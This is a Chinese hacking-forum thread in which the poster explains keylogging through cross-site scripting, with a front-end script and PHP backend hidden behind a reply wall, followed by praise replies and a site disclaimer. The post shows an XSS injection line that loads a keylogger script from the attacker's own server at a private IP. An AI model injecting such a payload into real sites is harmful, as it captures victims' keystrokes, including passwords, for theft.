搜索
查看: 5628|回复: 15

利用XSS进行键盘记录

    [复制链接]

598

主题

876

帖子

2235

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2235

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2019-4-10 19:57:20 | 显示全部楼层 |阅读模式
准备
原理分析:
我们利用前端js记录键盘操作,然后将键盘记录通过php保存到本地。
前端js

游客,如果您要查看本帖隐藏内容请回复

将192.168.123.231改成你的ip地址或者域名。
后端PHP

游客,如果您要查看本帖隐藏内容请回复

将这两个文件放到服务器或者apacher更目录


启动apacher
service apache2 start

提交
在存在xss攻击的页面处我们提交恶意js
  1. <script type="text/javascript" src="http://192.168.123.231/kk.js" language="JavaScript"></script>
复制代码

我们在随便输入文字内容



记录的内容



当然这两个附件我打包了,可以自己测试下!



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

0

主题

5

帖子

6

积分

新手开车

Rank: 1

积分
6
发表于 2019-4-10 20:27:33 来自手机 | 显示全部楼层
楼主厉害,学习了
回复 支持 2 反对 0

使用道具 举报

282

主题

399

帖子

878

积分

vip用户

Rank: 6Rank: 6

积分
878

注册会员活跃会员热心会员

QQ
发表于 2019-4-10 20:44:25 来自手机 | 显示全部楼层
支持大佬!
回复

使用道具 举报

1

主题

25

帖子

47

积分

新手开车

Rank: 1

积分
47
发表于 2019-4-11 11:06:54 来自手机 | 显示全部楼层
我来学习一下
回复 支持 1 反对 0

使用道具 举报

0

主题

34

帖子

76

积分

vip用户

Rank: 6Rank: 6

积分
76
发表于 2019-4-11 14:42:30 | 显示全部楼层
学习学习,支持大佬
回复 支持 1 反对 0

使用道具 举报

0

主题

2

帖子

5

积分

新手开车

Rank: 1

积分
5
发表于 2019-4-12 08:33:35 | 显示全部楼层
查看内容
回复

使用道具 举报

0

主题

6

帖子

11

积分

新手开车

Rank: 1

积分
11
发表于 2019-4-13 10:22:56 | 显示全部楼层
tql tql tql tql tql
回复 支持 反对

使用道具 举报

0

主题

4

帖子

6

积分

vip用户

Rank: 6Rank: 6

积分
6
发表于 2019-4-13 11:16:38 | 显示全部楼层
希望看到隐藏内容
回复 支持 反对

使用道具 举报

0

主题

4

帖子

6

积分

vip用户

Rank: 6Rank: 6

积分
6
发表于 2019-4-13 11:31:01 | 显示全部楼层
我测试了下,根本输入不了那么多的字符在文本框内
,恶意代码写不进去
回复 支持 反对

使用道具 举报

0

主题

2

帖子

3

积分

新手开车

Rank: 1

积分
3
发表于 2019-4-13 16:17:02 | 显示全部楼层
我想看这个东西ok不,烦不烦

回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

温馨提示
1:发帖请遵守《中华人民共和国网络安全法》,发帖内容不得维护国家的、集体的、个人的利益。
2:请勿发布恶意攻击他人的技术文章、工具、和使用教程,发现后删帖处理。
3:本站的目的在于让更多的人了解网络安全,避免受到他人的恶意攻击。
4:本站中的部分文章,可能会出现一些“技术类手段”,但这仅仅为学习演示所用,而非恶意传播技术。
5:本站中的部分文章,可能转载自互联网。如有侵权行为,联系我们删除即可。
6:学习仅是充实头脑,切勿恶意攻击个人、企业等。所造成的法律后果一切由自己承担,本站及其站长概不负责。
朕知道了
快速回复 返回顶部 返回列表